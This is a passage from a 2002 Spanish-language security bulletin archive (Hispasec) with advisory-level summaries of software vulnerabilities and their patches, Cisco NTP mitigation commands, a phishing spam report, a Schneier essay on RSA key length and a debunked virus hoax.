+ goto exec_abort;
}
if (flags & FWRITE)
vp->v_writecount++;






Jesús Cea Avión
jcea@hispasec.com


Más información:

# 003: SECURITY FIX: May 8, 2002

A race condition exists where an attacker could fill the file descriptor
table and defeat the kernel's protection of fd slots 0, 1, and 2 for a
setuid or setgid process.

http://www.openbsd.org/errata.html#fdalloc2

Parche OpenBSD 3.1


ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.1/common/003_fdalloc2.patch

Parche OpenBSD 3.0


ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.0/common/021_fdalloc2.patch

Parche OpenBSD 2.9


ftp://ftp.openbsd.org/pub/OpenBSD/patches/2.9/common/026_fdalloc2.patch



jueves, 16 de mayo de 2002

Importante actualización para Internet Explorer

Microsoft publica un parche destinado a cubrir seis nuevas y graves
vulnerabilidades para Internet Explorer en sus versiones 5.01, 5.5 y
6.0. Además se trata de una actualización acumulativa destinada a evitar
todos los problemas conocidos hasta la fecha para dichos productos.
Las nuevas vulnerabilidades corregidas son las siguientes:

* Vulnerabilidad de cross-site scripting en un recurso HTML local. Una
de las páginas incluidas por defecto con la distribución de IE permite
la inyección de código en el contexto de seguridad de la zona local. El
atacante podría preparar una página web destinada a explotar esta
vulnerabilidad para dejarla en un sitio web o enviarla por email. Cuando
el usuario afectado visualice la página web se ejecutará el código
preparado por el atacante con el contexto de seguridad de la zona local.


* Vulnerabilidad de divulgación de información relacionada con el
tratamiento de scripts dentro de cookies que podrá permitir a un sitio
la lectura de las cookies de otro sitio web diferente.


* Una vulnerabilidad de falsificación de zona que puede permitir a una
página web que puede hacer que una página web sea tratada de forma
incorrecta en el contexto de seguridad de una zona diferente a la que le
corresponde.


* Dos variantes de la vulnerabilidad relacionada con la falsificación de
formatos de descarga confiables. De forma que si un atacante modifica
las cabeceras Content-Disposition y Content-Type podrá lograr que
Explorer considere que el archivo a descargar sea de una extensión
considerada como no peligrosa cuando en realidad si lo es.


* Finalmente, se introduce un cambio de comportamiento en la zona de
Sitios Restringidos. Específicamente se deshabilita el uso de frames en
dicha zona.


Puede descargarse la actualización para corregir esta vulnerabilidad
desde:

http://www.microsoft.com/windows/ie/downloads/critical/Q321232/default.asp





Antonio Ropero
antonior@hispasec.com


Más información:

Boletín de seguridad Microsoft (MS02-023):
Cumulative Patch for Internet Explorer
http://www.microsoft.com/technet/security/bulletin/MS02-023.asp



miércoles, 15 de mayo de 2002

"Spam" para robar datos sensibles

Todos los usuarios de Internet hemos recibido en alguna ocasión
mensajes de correo electrónico no solicitados de alguien que no
conocíamos, la mayoría de las veces con anuncios y publicidad. Este
tipo de mensajes enviados de forma masiva e indiscriminada es lo que
denominamos "correo basura" o "spam". En los últimos tiempos hemos
podido observar como prolifera esta vía para hacer llegar mensajes
que, mediante engaños, tratan de robar información sensible del
usuario, como contraseñas y datos de tarjetas de crédito.
Curiosidades

Debemos retroceder a 1926 para encontrar el término "Spam",
que en su origen hacía referencia al jamón con especias (Spiced Ham)
de la casa Hormel, primer producto de carne enlatada que no requería
refrigeración. Esta característica convirtió al "Spam" en un producto
muy extendido, que podía encontrarse en cualquier parte.

Además de ser utilizado en la segunda guerra mundial por los ejércitos
como parte imprescindible de los víveres, el "Spam" solía acompañar a
cualquier plato de la cocina americana de la época. La popularidad
que ha alcanzado este producto es tal que hoy día podemos visitar
hasta su propio museo. El uso masivo que se hacía del "Spam", que
podía encontrarse prácticamente en cualquier sitio, puede ser la
razón por la que se ha utilizado este término para calificar el envío
de correo indiscriminado a través de Internet.

También basándose en el producto de carne enlatada, algunos defienden
que el uso del término "spam" para calificar al correo basura se
popularizó a raíz de una obra de los británicos Monthy Phyton en una
escena en la que en un restaurante todos los platos eran acompañados
por "spam". Otra teoría alternativa afirma que el término SPAM es el
acrónimo de "Stuff Posing As Mail", traducido como "mentira que se
presenta como correo".

En el ataque

La versatilidad del correo electrónico a través de Internet, como toda
tecnología, puede utilizarse con distintos fines. Hace apenas una
semana se ha distribuido un "spam" masivo que bajo el asunto "An
Urgent notice from eBay Safe Harbor !", simulaba ser un aviso a los
usuarios registrados del popular sitio eBay. El mensaje fraudulento
notifica que los datos de nuestra cuenta de eBay deben ser
actualizados por encontrarse erróneos o corruptos, para lo cual
facilita un enlace a un formulario web que deberemos rellenar para
que no se nos interrumpa el servicio.

Para darle más credibilidad, la dirección de remite aparece como "Safe
Harbor" <SafeHarbor@eBay.com>, mientras que a lo largo del mensaje
hace referencia a que se utiliza SSL para que los datos transferidos
viajen de forma segura, así como todo tipo de garantías sobre
privacidad avalada por terceros. Una vez llegamos al formulario,
mediante una URL encabezada por la IP del servidor, para intentar
ocultar que el dominio no pertenece en realidad a eBay, nos encontramos
con el citado formulario que simula el interfaz de eBay (logos, etc).

Por descontado, toda la información que se introduzca llegará a las
manos del atacante, que podrá utilizarla para suplantar la identidad
de los usuarios de eBay o realizar compras en otros sitios con los
datos de sus tarjetas de crédito.



Bernardo Quintero
bernardo@hispasec.com


Más información:

SPAM Museum
http://www.hormel.com/Hormel/news.NSF/LUDocument/D0143?OpenDocument

"Spam" (Monthy Phyton)
http://www.montypython.net/scripts/spam.htm

eBay
http://www.ebay.com/



martes, 14 de mayo de 2002

Vulnerabilidad en el demonio CacheFS de Solaris

El demonio CacheFS de Solaris contiene un desbordamiento de búfer que
permite la ejecución de código arbitrario en el servidor, con
privilegios de administrador o "root".
CacheFS (cachefsd) es un demonio accesible por RPC (llamada a
procedimiento remoto), utilizado para optimizar el acceso a servidores
remotos NFS.

Las versiones de CacheFS contenidas en Solaris 2.5.1, 2.6, 7 y 8 (tanto
x86 como Sparc), son susceptibles a un ataque de desbordamiento de búfer
que permite la ejecución de código arbitrario en el servidor, con
privilegios de administrador o "root". El ataque, vía RPC, puede
realizarse de forma remota.

La recomendación es desactivar CacheFS si no se utiliza, hasta contar
con un parche. Si dicho demonio es imprescindible en el sistema, hasta
que se disponga de un parche se debe limitar el tráfico RPC a máquinas
de confianza. SUN todavía no ha publicado un parche oficial.



Jesús Cea Avión
jcea@hispasec.com


Más información:

M-078: Sun Heap Overflow in Cachefs Daemon (cachefsd)
http://www.ciac.org/ciac/bulletins/m-078.shtml

Sun Microsystems cachefsd Buffer Overflow Vulnerability
http://www.auscert.org.au/Information/Advisories/advisory/AA-2002.01.txt

CERT® Advisory CA-2002-11 Heap Overflow in Cachefs Daemon (cachefsd)
http://www.cert.org/advisories/CA-2002-11.html

Synopsis: Buffer Overflow in cachefsd in Solaris
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F44309

Overflow de Heap en el Demonio Cachefs
http://www.unam-cert.unam.mx/Boletines/Boletines2002/boletin-UNAM-CERT-2002-011.html



lunes, 13 de mayo de 2002

Vulnerabilidad en Virtualvault 4.5 IWS

Las Series HP9000 700/800 11.4 se ven afectadas por un problema de
seguridad que permitiría el acceso remoto al servidor web de
administración.
Virtualvault es un servidor de transacciones seguras, nacido para
proporcionar conexión entre aplicaciones y bases de datos y entre
clientes y empresas. El diseño de Virtualvault está enfocado de cara a
actividades bancarias en Internet, sistemas de facturación en línea,
comercio electrónico, etc.

Bajo determinadas circunstancias el servidor para la administración
Virtualvault podría aceptar conexiones de servidores webs externos, HP
recomienda con la finalidad de minimizar el impacto de esta
vulnerabilidad el restringir los privilegios del servidor de
administración.

Igualmente Hewlett-Packard, pone a disposición de sus usuarios
registrados el correspondiente parche, con el cual evitará verse
afectado por el problema descrito anteriormente. El parche se
ofrece bajo la numeración A.04.50 - PHSS_24038.



Antonio J. Román Arrebola
roman@hispasec.com


Más información:

HP Virtualvault Unauthorized Administrative Access Vulnerability
http://online.securityfocus.com/advisories/4100



domingo, 12 de mayo de 2002

Vulnerabilidad NTP en dispositivos Cisco

Todos las versiones del software IOS de los dispositivos Cisco se ven
afectadas por una vulnerabilidad en el demonio que procesa las
peticiones NTP. El problema reside en una condición de desbordamiento de
bufer de forma remota en el demonio NTP.
NTP es un protocolo estándar para la sincronización de relojes de
máquinas interconectadas a través de redes de datos, en particular
Internet. Este protocolo permite que el reloj de un sistema mantenga una
gran precisión, independientemente de su calidad intrínseca y de las
condiciones de la red.

Si un atacante consigue explotar con éxito esta vulnerabilidad podrá
ejecutar código malicioso en la máquina vulnerable o de forma más
probable conseguir que el dispositivo se cuelgue.

Cisco proporciona actualizaciones de Cisco IOS para evitar este
problema.

También existen una serie de contramedidas recomendadas para paliar los
efectos de este problema.

* Impedir a IOS el proceso de peticiones NTP. Esto puede realizarse
mediante el siguiente comando:

ntp access-group serve-only

* Emplear NTP con autenticación. Se puede activar esta característica en
todos las partes y servidores participantes. Esto puede realizarse de la
siguiente forma:

ntp authentication-key 20 md5 llave_NTP
ntp authenticate

ntp trusted-key 20

Nota: La llave debe ser la misma en todas las partes participantes.

* Es posible mitigar el riesgo mediante el uso de ACLs y eliminando
todos los paquetes NTP que no provengan de servidores legítimos. Esto
puede realizarse de la siguiente forma:

access-list 10 permit 1.2.3.4
access-list 10 permit 5.6.7.8
access-list 10 deny any any
!
ntp access-group peer 10

1.2.3.4 y 5.6.7.8 son direcciones de las partes y servidores desde los
que los paquetes NTP serán aceptados.

* Si no se hace uso de servidores NTP externos a la red, se pueden
eliminar todos los paquetes NTP exteriores al perímetro de la red. Esto
puede realizarse de la siguiente forma:

access-list 101 deny udp any any eq ntp



Antonio Ropero
antonior@hispasec.com


Más información:

Cisco Security Advisory: NTP Vulnerability
http://www.cisco.com/warp/public/707/NTP-pub.shtml



sábado, 11 de mayo de 2002

Grave problema de seguridad en MSN Chat

Esta nueva vulnerabilidad podría permitir la ejecución de comandos
en usuarios que utilicen MSN Messenger, MSN Chat y Exchange Instant
Messenger.
MSN Chat Control, MSN Messenger en sus versiones 4.5 y 4.6, y Exchange
Instant Messenger 4.5 y 4.6 están afectados por un problema de
seguridad que podría permitir a un atacante ejecutar comandos en la
máquina de la víctima. Para ello el atacante utiliza la posibilidad
de causar un desbordamiento de búfer en "ResDLL", un parámetro del
control ActiveX MSN Chat, con ello conseguiría la ejecución de
código en la máquina afectada con los privilegios del usuario
atacado.

Microsoft ha publicado el correspondiente parche con el fin de paliar
esta vulnerabilidad en las dirección:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=38790

Igualmente Microsoft ofrece a disposición de sus usuarios versiones
corregidas para el software afectado.

MSN Chat control:
http://chat.msn.com

MSN Messenger:
http://messenger.msn.com/download/download.asp?client=1&update=1

Exchange Instant Messenger:
http://www.microsoft.com/Exchange/downloads/2000/IMclient.asp



Antonio J. Román Arrebola
roman@hispasec.com


Más información:

Unchecked Buffer in MSN Chat Control Can Lead to Code Execution
http://www.microsoft.com/technet/security/bulletin/MS02-022.asp

Actualización de MSN Messenger y MSN Chat
http://messenger.msn.es/support/knownissues.asp?client=1



viernes, 10 de mayo de 2002

Diversas vulnerabilidades IRIX

En los últimos días se han publicado un buen número de vulnerabilidades
en entornos IRIX.
IRIX es la versión del sistemas operativo UNIX para máquinas SGI (antes
Silicon Graphics). Se trata de un sistema UNIX de última generación,
especialmente preparado para gestionar discos duros de muy alta
capacidad de forma eficiente y entornos en tiempo real, necesario para
poder trabajar con vídeo digital con seguridad.

Algunas de las últimas vulnerabilidades publicadas por SGI son:

* Dhpsnmpd: Este componente SNMP permite la ejecución de código
arbitrario en el servidor, con privilegios de administrador o "root".

* Syslogd: Un usuario malicioso puede matar este proceso y provocar un
ataque de denegación de servicio (DoS).

* IRISconsole: Bajo ciertas circunstancias, esta aplicación permite el
acceso a la cuenta de administración introduciendo una contraseña
errónea.

* Pmcd: Desbordamiento de búfer que permite la ejecución de código
arbitrario como administrador o "root".

* /dev/ipfilter: Este objeto tiene los permisos de acceso por defecto
incorrectos, permitiendo su lectura por parte de usuarios arbitrarios y
pudiendo provocar un ataque DoS.

* Cpr: Desbordamiento de búfer que permite la ejecución de código
arbitrario como administrador o "root".

* Nsd: Este programa permite sobreescribir cualquier fichero de la
máquina.

* Xlib: Numerosos desbordamientos de búfer. Si el programa que usa la
librería es SETUID o SETGID, permitirán la ejecución de código
arbitrario en el servidor, con privilegios SETUID o SETGID.

* Netstat: Permite determianr si existe un fichero arbitrario en el
sistema, aunque no tengamos permiso para ello.

* Fsr_xfs: Este programa (reorganizador del sistema de ficheros XFS
nativo de IRIX) permite sobreescribir ciertos ficheros críticos,
permitiendo que un atacante alcance nivel de administrador o "root".

Todas estas vulnerabilidades cuentan ya con parches. Se recomienda leer
los boletines SGI de seguridad con atención, para determinar la
extensión de las vulnerabilidades y conocer los pasos a seguir.



Jesús Cea Avión
jcea@hispasec.com


Más información:

SGI Security Advisories
http://www.sgi.com/support/security/advisories.html

IRIX hpsnmpd vulnerability
ftp://patches.sgi.com/support/free/security/advisories/20020404-01-P

IRIX syslogd vulnerability
ftp://patches.sgi.com/support/free/security/advisories/20020405-01-I

IRISconsole icadmin password vulnerability
ftp://patches.sgi.com/support/free/security/advisories/20020406-01-P

pmcd Denial of Service vulnerability
ftp://patches.sgi.com/support/free/security/advisories/20020407-01-I

/dev/ipfilter Denial of Service vulnerability
ftp://patches.sgi.com/support/free/security/advisories/20020408-01-I

IRIX cpr vulnerability
ftp://patches.sgi.com/support/free/security/advisories/20020409-01-I

IRIX nsd symlink vulnerability
ftp://patches.sgi.com/support/free/security/advisories/20020501-01-I

Xlib vulnerability
ftp://patches.sgi.com/support/free/security/advisories/20020502-01-I

netstat vulnerability
ftp://patches.sgi.com/support/free/security/advisories/20020503-01-I

fsr_xfs vulnerability
ftp://patches.sgi.com/support/free/security/advisories/20020504-01-I



jueves, 9 de mayo de 2002

Vulnerabilidad en el demonio DHCP de ISC

Se ha descubierto una vulnerabilidad en el demonio DHCP de ISC (Internet
Software Consortium) que permitiría a un atacante remoto la ejecución de
código arbitrario en el servidor afectado.
El protocolo DHCP (Dynamic Host Configuration Protocol) tiene como objetivo
principal la asignación de direcciones IP y otros parámetros de configuración
a los sistemas clientes. En una red que utilice este protocolo, cada vez que
se inicia un cliente pide una dirección IP, o una renovación de la que tiene
actualmente, al servidor DHCP. De esta forma se logra que la asignación y
liberación de las direcciones IP en una red sea dinámica y automática,
evitando duplicidades, optimizando el consumo de direcciones, al mismo
tiempo que facilita las tareas del administrador de red.

La vulnerabilidad se ha detectado en ISC DHCPD versiones de la 3.0 a la
3.0.1rc8, inclusive, que por defecto mantienen activada la opción NSUPDATE
para dialogar con un servidor DNS (Domain Name Server). El problema se
encuentra en el módulo DHCP encargado de registrar los mensajes que
devuelve el servidor DNS, ya que construyendo una cadena con un formato
adecuado es posible forzar la ejecución de código arbitrario con los
privilegios del demonio DHCP, típicamente root (máximos privilegios).

En el aviso del CERT se puede encontrar un listado de los fabricantes
afectados y las soluciones propuestas para mitigar esta vulnerabilidad.



Bernardo Quintero
bernardo@hispasec.com


Más información:

Aviso de seguridad del CERT:
http://www.cert.org/advisories/CA-2002-12.html

ISC DHCPDv3, remote root compromise (NGSEC)
http://www.ngsec.com/docs/advisories/NGSEC-2002-2.txt


miércoles, 8 de mayo de 2002

Denegación de servicio a través de teclados Logitech

Los teclados de la serie iTouch de Logitech pueden verse afectados por
un problema, que en determinadas circunstancias, puede llegar a causar
el cuelgue del sistema en el que se encuentran instalados.
Logitech tiene un controlador disponible con su línea de teclados iTouch
que permite presionar un botón y ejecutar automáticamente un programa,
el control de volumen, apagar el PC, etc. Sin embargo estos botones
siguen funcionando cuando el ordenador (con NT/2000/XP, etc.) se
encuentra bloqueado.

Resulta bastante frecuente que determinados servidores o estaciones que
prestan determinados servicios se encuentren siempre, o habitualmente,
con el sistema bloqueado, para impedir que ningún usuario no autorizado
acceda a ellos. Sin embargo, un usuario malicioso podrá colgar estos
ordenadores si estos disponen del sistema de ejecución automática de
aplicaciones a través del teclado.

Un usuario podrá lanzar un típico ataque de denegación de servicio
presionando numerosas veces uno de dichos botones, y abrir todo el
número de copias que desee del programa asignado. Por ejemplo, podrá
abrir 100 o más instancias de un programa hasta conseguir ocupar toda la
memoria del sistema. Las consecuencias de este problema dependerán de
los programas asignados a las teclas de acceso rápido.



Antonio Ropero
antonior@hispasec.com


Más información:

Help Net Security:
http://www.net-security.org/vuln.php?id=1650



martes, 7 de mayo de 2002

Vulnerabilidad en el demonio "rwall" de Solaris

El demonio "rwall" disponible en las versiones SUN Solaris 2.5.1, 2.6, 7
y 8 es susceptible a un ataque de formato que permite ejecutar código
arbitrario en el servidor, con los privilegios del demonio "rwall".
"rwall" (remote wall) es un protocolo RPC (llamada a procedimiento
remoto) que permite la visualización de un mensaje en todos los
terminales con usuarios conectados.

Las versiones de SUN Solaris 2.5.1, 2.6, 7 y 8 contienen un demonio
"rwall" que permite un ataque de formato, posibilitando la ejecución de
código arbitrario en el servidor, con los privilegios del demonio
"rwall". El éxito del ataque depende de una combinación de
circunstancias, pero es real y existen ya "pruebas de concepto" del
mismo.

La recomendación, a la espera de que Sun publique los parches
correspondientes, consiste en eliminar el servicio "rpc.rwall" en el
superdemonio "inetd" para deshabilitarlo.



Jesús Cea Avión
jcea@hispasec.com


Más información:

Fallos de seguridad en Sun Solaris


http://www.vnunet.es/computing/noticias.asp?id=20020506030

CERT® Advisory CA-2002-10 Format String Vulnerability in rpc.rwalld


http://www.cert.org/advisories/CA-2002-10.html

Vulnerabilidad de Formato de Cadena en rpc.rwalld


http://www.unam-cert.unam.mx/Boletines/Boletines2002/boletin-UNAM-CERT-2002-010.html



lunes, 6 de mayo de 2002

Acceso a los archivos locales mediante Mozilla

Mozilla y Netscape 6.1 tienen una vulnerabilidad que permite a un atacante
remoto acceder, en modalidad de lectura, a los archivos presentes en el disco
duro del usuario.
Se trata de un problema que recuerda, en gran medida, a uno descubierto
meses atrás en Internet Explorer 6.0 relacionado con problemas en los
servicios XML utilizados por Internet Explorer 6.0, Windows XP y Microsoft
SQL Server 2000.

En esta ocasión, la vulnerabilidad descubierta está asociada al objeto
XMLHttpRequest de Mozilla y es muy semejante al problema de Internet
Explorer antes referido.

El problema es el siguiente: cuando se envía un método "open" a una página
web que redirecciona a un archivo local/remoto, Mozilla considera que
todavía se encuentra en la zona permitida, por lo que es posible al atacante
remoto leer el contenido del sistema de archivos.

Una demostración de esta vulnerabilidad está disponible en
http://sec.greymagic.com/adv/gm001-ns/mozexplorer.html. Accediendo a
esta dirección con Mozilla (versiones 0.9.6 y posteriores) o Netscape 6.1,
podemos ver el contenido de nuestro disco duro y ver el contenido de
cualquier archivo.

Las versiones donde se ha comprobado la existencia de este problema son:

o Mozilla 0.9.6 (Unix)
o Mozilla 0.9.7 (Windows)
o Mozilla 0.9.8 (Unix)
o Mozilla 0.9.9 (Windows y Unix)
o Mozilla RC1 (FreeBSD)
o Netscape 6.1 (Windows)
o Netscape 6.2.1 (Windows)
o Netscape 6.2.2 (Windows y Unix)

Otras versiones pueden ser igualmente vulnerables, aunque no existe
constancia formal.

La versión 1.0 (Release Candidate 1) de Mozilla en las plataformas Linux y
Windows no se ve afectada por el problema, aunque esto es debido a que el
objeto XMLHttpRequest no funciona correctamente en esas versiones.

Este problema ha sido ya solucionado, de forma que las versiones de Mozilla
posteriores al 2 de mayo no son vulnerables a este problema.



Xavier Caballé
xavi@hispasec.com



domingo, 5 de mayo de 2002

Problemas de seguridad en placas Intel D845HV/WN y PT

Una serie de placas madres de Intel se ve afectada por un problema que
podría permitir a un atacante evitar todas las protecciones de seguridad
impuestas por el administrador en la BIOS del sistema.
Un problema en las placas para Pentium 4 D845HV/WN (versión BIOS
P05-0022, P09-0035, P10-0038), D845PT (versión BIOS P01-0012) facilitará
que si el usuario pulsa F8 durante el arranque de la BIOS se muestre un
menú para la elección del dispositivo de arranque. Esto se reproducirá
aún en el caso de que la BIOS estuviera protegida por clave.

Este problema facilitará a un atacante seleccionar el dispositivo por el
que desea que se inicie el ordenador, lo que permitirá arrancar desde un
disquete (u otro medio) y acceder al disco duro o al sistema.

El autor del descubrimiento de esta vulnerabilidad recomienda establecer
una clave a la BIOS, seguidamente dejar el disco duro como único
dispositivo de inicio y limitar el acceso de usuario a "ningún acceso".
De esta forma, aunque el atacante intente reproducir el problema no
conseguirá su objetivo ya que el sistema siempre arrancará desde el
disco duro.



Antonio J. Román Arrebola
roman@hispasec.com


Más información:

Intel D845 Motherboard BIOS Series Arbitrary Boot Media Vulnerability
http://online.securityfocus.com/archive/1/269646



sábado, 4 de mayo de 2002

Vulnerabilidad en WinAmp

Las versiones de WinAmp anteriores a la 2.80 tienen una vulnerabilidad
que puede ser aprovechada para la ejecución de código arbitrario.
Los archivos de música MP3 pueden contener un marcador ID3v2, pensado
para almacenar información sobre el título de la canción, el intérprete
y el álbum. No obstante, este marcador no está en absoluto limitado a
este tipo de información sino que puede contener virtualmente cualquier
dato, ya que su tamaño máximo puede llegar hasta los 256 MB.

WinAmp analiza los archivos MP3 en el momento de abrirlo. Si encuentra
el marcador ID3v2, el contenido del mismo es analizado. Cuando el
mini-navegador incluido con WinAmp está activo, el programa utiliza la
información incluida dentro del marcador para obtener más información
acerca del archivo MP3.

En este punto, WinAmp construye una URL para consultar en
info.winamp.com la existencia de información adicional. Si la
información almacenada en el marcador ID3v2 tiene un formato especial,
la construcción de esta URL puede provocar un desborde de memoria
intermedia.

Esta vulnerabilidad puede ser aprovechada por un atacante para forzar la
ejecución de código arbitrario en el momento de abrir el archivo MP3. No
obstante, debe indicarse que es una tarea compleja debido a la
existencia de determinadas limitaciones en los caracteres que pueden
utilizarse.

Para evitar este problema, es necesario instalar la versión 2.80 de
WinAmp o bien desactivar el mini-navegador.



Xavier Caballé
xavi@hispasec.com



viernes, 3 de mayo de 2002

Agujero de seguridad en Macromedia Flash

Detectada vulnerabilidad en Flash.OCX, un objeto ActiveX que se
instala en Internet Explorer y permite visualizar objetos Flash en las
páginas webs. El desbordamiento de buffer permitiría a un atacante
ejecutar código arbitrario de forma remota, por lo que se aconseja la
actualización inmediata a todos los usuarios.
Un atacante podría aprovechar la vulnerabilidad para construir una
página web o un mensaje en formato HTML que forzaría la ejecución
de código arbitrario al ser visualizado por un usuario afectado.

La versión del componente afectada en la 6 revisión 23, sin bien
el problema podría reproducirse también en versiones posteriores.
Macromedia pone a disposición de los usuarios la última versión de
su reproductor Flash, versión 6 revisión 29, libre del fallo. Los
usuarios deberán dirigirse a la siguiente dirección para proceder
a la actualización:

http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash

Los detalles sobre la vulnerabilidad pueden encontrarse en el
aviso original de eEyee, los descubridores, publicado en la
dirección:

http://www.eeye.com/html/Research/Advisories/AD20020502.html



Bernardo Quintero
bernardo@hispasec.com


Más información:

Macromedia Flash Activex Buffer overflow (Vulnerabilidad)

http://www.eeye.com/html/Research/Advisories/AD20020502.html

Macromedia Web Player Download Center (Actualización)

http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash



jueves, 2 de mayo de 2002

¿Basta con 1024 bits?

A continuación se transcribe, traducido libremente al castellano, un
pequeño artículo escrito por Bruce Schneier, reputado criptólogo de fama
mundial y autor de algoritmos como "blowfish" y "twofish", uno de los
finalistas del reciente AES.
El artículo fue publicado en el boletín "Crypto-Gram", del 15 de Abril
de 2002.



¿Basta con 1024 bits?.

El mes pasado escribí a propósito de las investigaciones de Dan
Bernstein sobre factorizaciones, y cómo dicho trabajo puede afectar al
tamaño de las claves RSA. En los últimos días se han producido
discusiones al respecto en la lista de correo BugTraq, en la que el
cypherpunk "Lucky Green" citaba este trabajo como la principal
motivación para revocar su clave PGP de 1024 bits.

Esto provoca una interesante pregunta: ¿son las claves RSA de 1024 bits
inseguras y, si es el caso, qué debe haberse al respecto?.

El récord de factorización público actual es de 512 bits, utilizando
ordenadores de propósito general. La prudencia nos obliga a que
sospechemos que instituciones como la ASN (Agencia de Seguridad Nacional
de EE.UU.) pueden superar dicho récord de forma privada, aunque no
sabemos por qué porcentaje.

En 1995 estimé que la longitud de las claves necesarias para protegernos
de diferentes adversarios: individuos, corporaciones y gobiernos
(Applied Cryptography, segunda edición, tabla 7.6, página 162). En aquel
momento sugerí que se debería migrar a claves de 1280 bits o, incluso,
1536 bits, si nos preocupaba tener a grandes corporaciones y gobiernos
como adversarios.:

Longitud recomendada de la clave pública RSA

Año Ind. Corp. Gob.<
1995 768 1280 1536
2000 1024 1280 1536
2005 1280 1536 2048
2010 1280 1536 2048
2015 1536 2048 2048


Mirando estos números escritos hace siete años, creo que eran
conservadores, aunque no demasiado. La factorización, al menos entre la
comunidad académica, no ha progresado tan rápido como esperaba. Pero el
progreso matemático ocurre a ráfagas, y un descubrimiento transcendental
puede recuperar el progreso perdido. Así que si estuviese haciendo estas
recomendaciones hoy mismo, mantendría mis estimaciones del año 2000.

Hace tiempo que creo que una clave de 1024 bits puede romperse con una
máquina de mil millones de dólares. Y sigo creyendo también que una
clave RSA de 1024 bits es aproximadamente equivalente a una clave
simétrica de 80 bits (en Applied Cryptography, escribí que una clave RSA
de 768 bits es equivalente a una clave simétrica de 80 bits; eso
probablemente fue una infravaloración de las claves RSA).

Comparar claves simétricas com asimétricas es como comparar manzanas con
naranjas. Recomiendo claves simétricas de 128 bits porque trabajar con
ellas es tan rápido como con claves de 64 bits. Esto no es cierto para
las claves asimétricas. Doblar el tamaño de la clave supone,
aproximadamente, dividir la velocidad de procesamiento software por
seis. Esto puede no tener importancia para PGP, por ejemplo, pero puede
convertir aplicaciones cliente-servidor como SSL en tortugas. He visto
artículos proclamando que se necesita una clave RSA de 3072 bits para
que tenga una resistencia equivalente a una clave simétrica de 128 bits,
y claves RSA de 15.000 bits para resistir como claves simétricas de 256
bits. Este tipo de mentalidad es ridículo. Las prestaciones y los
modelos de ataque son tan diferentes que la comparación no tiene ningún
sentido.

No hay razón para el pánico y para descartar los sistemas actuales: No
creo que el anuncio de Bernstein haya cambiado nada. En la actualidad
podemos estar razonablemente contentos con nuestras claves de 1024 bits,
y los militares e instituciones lo bastante paranoicas como para
temerlas deberían haberlas actualizado hace años.

En mi opinión, la gran noticia del anuncio de Lucky Green no es que crea
que las investigaciones de Benstein sean lo bastante preocupantes como
para aconsejarle revocar sus claves de 1024 bits sino que, en el 2002,
Lucky Green todavía tiene claves RSA de 1024 bits que revocar.

Esta discusión subraya la inmensa inercia en el despliegue de claves.
Mucha gente todavía utiliza claves cortas. El mensaje de Lucky Green ha
arrojado luz sobre este fenómeno. Escribió "a la luz de esto, he
revocado todas mis claves PGP personales de 1024 bits y la gran telaraña
de confianza que dichas claves han adquirido con el tiempo". La malla de
confianza asociada a dichas claves tenía un gran valor, y restablecerla
con un nuevo conjunto de claves será difícil y llevará tiempo. Para
Green, el coste era más importante que tener claves "lo bastante
grandes".

El anuncio de Lucky Green en BugTraq
http://online.securityfocus.com/archive/1/263924

Mi ensayo sobre el artículo de Bernstein sobre factorización
http://www.counterpane.com/crypto-gram-0203.html#6

Cobertura periodística
http://zdnet.com.com/2110-1105-863643.html
http://www.infosecuritymag.com/2002/apr/news.shtml#factoringfriction

Otros ensayos sobre el artículo de Bernstein
http://www.rsasecurity.com/rsalabs/technotes/bernstein.html





Jesús Cea Avión
jcea@hispasec.com


Más información:

Is 1024 Bits Enough?
http://www.counterpane.com/crypto-gram-0204.html#3

Circuits for Integer Factorization: a Proposal
http://cr.yp.to/papers.html#nfscircuit



miércoles, 1 de mayo de 2002

Jdbgmgr.exe, se repite la historia de sulfnbk.exe

En los últimos días en Hispasec hemos recibido múltiples consultas
acerca de un mensaje que está alcanzando una gran difusión y ha
conseguido confundir a los usuarios al alertar de la presencia del
archivo jdbgmgr.exe como un supuesto virus.
La historia es muy similar, por no decir idéntica, a la del falso virus
conocido como sulfnbk.exe y del cual ya informamos en Hispasec en varias
ocasiones del pasado año, debido a la alta incidencia y propagación que
tuvo aquel aviso. Jdbgmgr.exe sigue su escuela, y lleva el mismo camino.

Según el aviso que se está propagando en estos últimos días por
Internet, se dice que "El virus circula por medio del MSM Messenger. El
virus se llama jdbgmgr.exe y se transmite automáticamente por medio del
Messenger y también por la libreta de direcciones. El virus no es
detectado por McAfee o Norton y permanece en letargo durante 14 días
antes de dañar el sistema entero. Puede ser borrado antes de que se
elimine los archivos de tu computadora.".

Tras ello, en el aviso se facilitan unos sencillos pasos para poder
comprobar si estamos infectados. El método consiste en buscar el fichero
jdbgmgr.exe en nuestro sistema, si lo encontramos estaremos infectados y
deberemos proceder a su eliminación. Al igual que ocurría con
sulfnbk.exe los usuarios al detectar el archivo indicado en sus
sistemas, cuya existencia y utilidad no son muy conocidas, provoca que
el "hoax" sea más creíble. Alertados por el suceso reenvían el bulo a
sus contactos y la cadena de histeria colectiva sigue aumentando.

Hay que aclarar, que toda la información proporcionada por el mensaje es
totalmente falsa y recomendamos se ignore su contenido e interrumpir la
cadena de difusión. Así como avisar al remitente del mensaje para
hacerle saber de su error.



Antonio Ropero
antonior@hispasec.com


Más información:

una-al-dia (09/01/2002) Rebrote del falso virus "Sulfnbk.exe"
http://www.hispasec.com/unaaldiacom.asp?id=1172

una-al-dia (10/05/2001) Sulfnbk.exe, historia de un virus inexistente
http://www.hispasec.com/unaaldia.asp?id=928

una-al-dia (30/05/2001) A vueltas con Sulfnbk.exe
http://www.hispasec.com/unaaldia.asp?id=948